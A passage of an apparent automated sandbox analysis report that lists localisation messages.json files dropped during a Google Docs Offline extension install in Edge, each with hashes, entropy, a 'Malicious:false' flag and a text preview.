                                                                                                                                                                                                                                                                                              SHA1:9471D71FA6D82CE1863B74E24237AD4FD9477187
                                                                                                                                                                                                                                                                                              SHA-256:102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
                                                                                                                                                                                                                                                                                              SHA-512:E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\es\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):961
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.537633413451255
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
                                                                                                                                                                                                                                                                                              MD5:F61916A206AC0E971CDCB63B29E580E3
                                                                                                                                                                                                                                                                                              SHA1:994B8C985DC1E161655D6E553146FB84D0030619
                                                                                                                                                                                                                                                                                              SHA-256:2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
                                                                                                                                                                                                                                                                                              SHA-512:D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\es_419\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):959
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.570019855018913
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
                                                                                                                                                                                                                                                                                              MD5:535331F8FB98894877811B14994FEA9D
                                                                                                                                                                                                                                                                                              SHA1:42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
                                                                                                                                                                                                                                                                                              SHA-256:90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
                                                                                                                                                                                                                                                                                              SHA-512:2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\et\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):968
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.633956349931516
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HA5WG6t306+9sihHvMfdJLjUk4NJPNczGr:mWGY0cOUdJODPmzs
                                                                                                                                                                                                                                                                                              MD5:64204786E7A7C1ED9C241F1C59B81007
                                                                                                                                                                                                                                                                                              SHA1:586528E87CD670249A44FB9C54B1796E40CDB794
                                                                                                                                                                                                                                                                                              SHA-256:CC31B877238DA6C1D51D9A6155FDE565727A1956572F466C387B7E41C4923A29
                                                                                                                                                                                                                                                                                              SHA-512:44FCF93F3FB10A3DB68D74F9453995995AB2D16863EC89779DB451A4D90F19743B8F51095EEC3ECEF5BD0C5C60D1BF3DFB0D64DF288DCCFBE70C129AE350B2C6
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "LOO UUS".. },.. "explanationofflinedisabled": {.. "message": "Teil ei ole v.rgu.hendust. Teenuse Google.i dokumendid kasutamiseks ilma Interneti-.henduseta avage j.rgmine kord, kui olete Internetiga .hendatud, teenuse Google.i dokumendid avalehel seaded ja l.litage sisse v.rgu.henduseta s.nkroonimine.".. },.. "explanationofflineenabled": {.. "message": "Teil ei ole v.rgu.hendust, kuid saate endiselt saadaolevaid faile muuta v.i uusi luua.".. },.. "extdesc": {.. "message": "Saate luua, muuta ja vaadata oma dokumente, arvustustabeleid ning esitlusi ilma Interneti-.henduseta.".. },.. "extname": {.. "message": "V.rgu.henduseta Google.i dokumendid".. },.. "learnmore": {.. "message": "Lisateave".. },.. "popuphelptext": {.. "message": "Kirjutage, muutke ja tehke koost..d .ksk.ik kus olenemata sellest, kas teil on Interneti-.hendus.".. }..}..

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\eu\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):838
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.4975520913636595
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:YnmjggqTWngosqYQqE1kjO39m7OddC0vjWQMmWgqwgQ8KLcxOb:Ynmsgqyngosq9qxTOs0vjWQMbgqchb
                                                                                                                                                                                                                                                                                              MD5:29A1DA4ACB4C9D04F080BB101E204E93
                                                                                                                                                                                                                                                                                              SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                                                                                                                                                                              SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                                                                                                                                                                              SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\fa\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1305
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.673517697192589
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                                                                                                                                                                              MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                                                                                                                                                                              SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                                                                                                                                                                              SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                                                                                                                                                                              SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\fi\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):911
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.6294343834070935
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                                                                                                                                                                              MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                                                                                                                                                                              SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                                                                                                                                                                              SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                                                                                                                                                                              SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\fil\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):939
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.451724169062555
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                                                                                                                                                                              MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                                                                                                                                                                              SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                                                                                                                                                                              SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                                                                                                                                                                              SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\fr\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):977
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.622066056638277
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                                                                                                                                                                              MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                                                                                                                                                                              SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                                                                                                                                                                              SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                                                                                                                                                                              SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\fr_CA\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):972
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.621319511196614
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                                                                                                                                                                              MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                                                                                                                                                                              SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                                                                                                                                                                              SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                                                                                                                                                                              SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\gl\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):990
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.497202347098541
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                                                                                                                                                                              MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                                                                                                                                                                              SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                                                                                                                                                                              SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                                                                                                                                                                              SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\gu\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1658
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.294833932445159
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                                                                                                                                                                              MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                                                                                                                                                                              SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                                                                                                                                                                              SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                                                                                                                                                                              SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\hi\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1672
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.314484457325167
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                                                                                                                                                                              MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                                                                                                                                                                              SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                                                                                                                                                                              SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                                                                                                                                                                              SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\hr\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):935
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.6369398601609735
                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                              SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                                                                                                                                                                              MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                                                                                                                                                                              SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                                                                                                                                                                              SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                                                                                                                                                                              SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                              Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..

                                                                                                                                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\scoped_dir7208_1548631495\CRX_INSTALL\_locales\hu\messages.json

                                                                                                                                                                                                                                                                                              Download File
                                                                                                                                                                                                                                                                                              Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                              Size (bytes):1065
                                                                                                                                                                                                                                                                                              Entropy (8bit):4.816501737523951
                                                                                                                                                                                                                                                                                              Encrypted:false
